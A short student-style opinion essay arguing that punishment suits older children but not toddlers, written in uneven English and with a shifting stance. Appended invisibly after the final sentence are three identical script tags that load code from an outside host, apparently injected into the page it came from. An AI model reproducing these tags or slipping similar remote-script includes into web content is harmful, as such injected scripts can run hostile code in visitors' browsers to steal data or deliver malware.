Nowadays, rising children is hard work because of our developing world . understanding the difference between right and wrong is essential for kids at any age. Parents should use punishment to help them understand this distinction. I am completely disagree with this idea.

A few days ago, I read an article about characters. I understand that the age range between 1 and 3 is very important because children's characters have been made at these ages. So I think parents must be aware of their children's behaviors. If they make a mistake, parents must help them understand that they did wrong with good words and a smile. If they do good work, parents should give them awards. In my opinion, for very young children, we shouldn't use punishment.

On the other hand, for older children, punishment is a good idea, and I think it would be effective. I think if they have bad habits and bad behavior at first, parents should try to understand the reason and speak to their children, and if that doesn't work, they can use punishment. For example, if your kids don't do their schoolwork, you can prevent them from playing with their mobile, laptop, etc. I think it works because, in these days, social media is very important for all people, even kids. So punishment can sometimes be very effective.

To sum up, dealing with kids is very hard work and requires patience. Parents and teachers should sometimes use punishment if they think it works.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>